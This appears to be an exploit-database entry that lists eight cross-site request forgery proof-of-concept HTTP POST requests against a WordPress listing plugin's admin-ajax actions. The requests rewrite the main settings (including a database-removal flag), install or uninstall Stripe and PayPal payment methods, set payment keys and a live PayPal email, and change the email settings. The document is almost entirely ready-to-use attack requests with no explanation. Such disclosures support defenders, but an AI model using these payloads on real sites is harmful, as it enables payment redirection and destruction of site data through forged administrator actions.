Share
## https://sploitus.com/exploit?id=WPEX-ID:91448867-FB75-4D76-815D-86AAD5A64225
PoC #1 | CSRF | Main Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6784

action=stm_settings_save&data%5Bcron%5D%5Bmode%5D=alternate&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Btitle%5D=Google&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_id%5D%5Btitle%5D=Google+Client+ID&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_secret%5D%5Btitle%5D=Google+Client+Secret&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5BclassList%5D%5Bwrap%5D=google-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5BclassList%5D%5Bicon%5D=icon-search+path1&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com%2Fwp-login.php%3Fsocial_method%3Dgoogle&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for+-+%3Ca+target%3D%22_blank%22+href%3D%22https%3A%2F%2Fdevelopers.google.com%2Fidentity%2Fsign-in%2Fweb%2Fsign-in%22%3EGoogle+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like+-&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Btitle%5D=Facebook&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_id%5D%5Btitle%5D=Facebook+App+ID&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_secret%5D%5Btitle%5D=Facebook+App+Secret&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5BclassList%5D%5Bwrap%5D=facebook-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5BclassList%5D%5Bicon%5D=fab+fa-facebook-f&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com%2F%3Fsocial_method%3DFacebook&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for+-+%3Ca+href%3D%22https%3A%2F%2Fdevelopers.facebook.com%2Fdocs%2Ffacebook-login%2F%22%3EFacebook+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like+-&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Btitle%5D=Twitter&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_id%5D%5Btitle%5D=Twitter+API+Key&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_secret%5D%5Btitle%5D=Twitter+API+Secret&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5BclassList%5D%5Bwrap%5D=twitter-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5BclassList%5D%5Bicon%5D=fab+fa-twitter&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for+-+%3Ca+href%3D%22https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Flog-in-with-twitter%2Flogin-in-with-twitter%22%3ETwitter+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like+-&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Btitle%5D=Vkontakte&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_id%5D%5Btitle%5D=Vkontakte+API+ID&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_secret%5D%5Btitle%5D=Vkontakte+Secret+Key&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5BclassList%5D%5Bwrap%5D=facebook-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5BclassList%5D%5Bicon%5D=fab+fa-vk&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for+-+%3Ca+href%3D%22https%3A%2F%2Fvk.com%2Fdev%22%3EVkontakte+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like+-&data%5BsocialLogin%5D%5Bpreferences%5D%5Btab%5D=yes&data%5BsocialLogin%5D%5Bpreferences%5D%5Bicons%5D=square&data%5BsocialLogin%5D%5Bpreferences%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data%5BsocialLogin%5D%5Bpreferences%5D%5Btitle%5D=Login+with+social+ID&data%5Bpages%5D%5Baccount_page%5D%5Baccount%5D=9&data%5Bpages%5D%5Baccount_endpoint%5D%5Bedit-profile%5D=edit-profile&data%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-plans%5D=my-plans&data%5Bpages%5D%5Baccount_endpoint%5D%5Bpayment-history%5D=payment-history&data%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-listing%5D=my-listing&data%5Bpages%5D%5Baccount_endpoint%5D%5Bsaved-searches%5D=saved-searches&data%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-card%5D=my-card&data%5Bpages%5D%5Baccount_endpoint%5D%5Bedit-account%5D=&data%5Bpages%5D%5Badd_listing%5D%5Blisting%5D=12&data%5Bpages%5D%5Bpricing_plan%5D%5Bpricing%5D=13&data%5Bpages%5D%5Blisting_type_page%5D%5B15%5D=16&data%5Bpages%5D%5Blisting_type_page%5D%5B17%5D=18&data%5Bpages%5D%5Blisting_type_page%5D%5B55%5D=2&data%5Bpages%5D%5Blisting_type_page%5D%5B62%5D=0&data%5Bpages%5D%5Bwishlist%5D%5Bwishlist_page%5D=&data%5Bpages%5D%5Bcompare%5D%5Bcompare_page%5D=&data%5Bmain%5D%5Bcurrency%5D%5Bcurrency%5D=USD&data%5Bmain%5D%5Bcurrency%5D%5Bposition%5D=left_space&data%5Bmain%5D%5Bcurrency%5D%5Bcharacters_after%5D=2&data%5Bmain%5D%5Bcurrency%5D%5Bdecimal_separator%5D=.&data%5Bmain%5D%5Bcurrency%5D%5Bthousands_separator%5D=%2C&data%5Bmain%5D%5Bmap%5D%5Bapi_key%5D=&data%5Bmain%5D%5Bmap%5D%5Bmap_type%5D=google&data%5Bmain%5D%5Bmap%5D%5Bhover_option%5D=no&data%5Bmain%5D%5Bpricing_plans%5D%5Bback_slots%5D=true&data%5Bmain%5D%5Bpricing_plans%5D%5Bdelete_listings%5D=true&data%5Bmain%5D%5Bshort_codes%5D%5Bcategories%5D=8&data%5Bmain%5D%5Bshort_codes%5D%5Bfeatured_listings%5D=8&data%5Bmain%5D%5Bextra%5D%5Bremove_db%5D=true&data%5Bmain%5D%5Bdefault_placeholder%5D=


PoC #2 | CSRF | Stripe Payment Install:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60

action=stm_payment_method&type=install&payment_method=stripe


PoC #3 | CSRF | Stripe Payment Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 260

action=stm_save_payment&id=stripe&data%5Bpublishable_key%5D=PoC&data%5Bsecret_key%5D=1553&data%5Bwhsec%5D=1553


PoC #4 | CSRF | PayPal Payment Install:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69

action=stm_payment_method&type=install&payment_method=paypal_standard


PoC #5 | CSRF | PayPal Payment Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94

action=stm_save_payment&id=paypal_standard&data%5Bemail%5D=poc%40email.tld&data%5Bmode%5D=live


PoC #6 | CSRF | PayPal Payment Uninstall:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 71

action=stm_payment_method&type=uninstall&payment_method=paypal_standard


PoC #7 | CSRF | Stripe Payment Uninstall:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 62

action=stm_payment_method&type=uninstall&payment_method=stripe


PoC #8 | CSRF | Email Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 439

action=stm_update_email_data&data%5Bbanner%5D=&data%5Blogo%5D=&data%5Bsocials%5D%5Binstagram%5D%5Blabel%5D=Instagram&data%5Bsocials%5D%5Binstagram%5D%5Blink%5D=&data%5Bsocials%5D%5Bfacebook%5D%5Blabel%5D=Facebook&data%5Bsocials%5D%5Bfacebook%5D%5Blink%5D=&data%5Bsocials%5D%5Byoutube%5D%5Blabel%5D=Youtube&data%5Bsocials%5D%5Byoutube%5D%5Blink%5D=&data%5Bsocials%5D%5Btwitter%5D%5Blabel%5D=Twitter&data%5Bsocials%5D%5Btwitter%5D%5Blink%5D=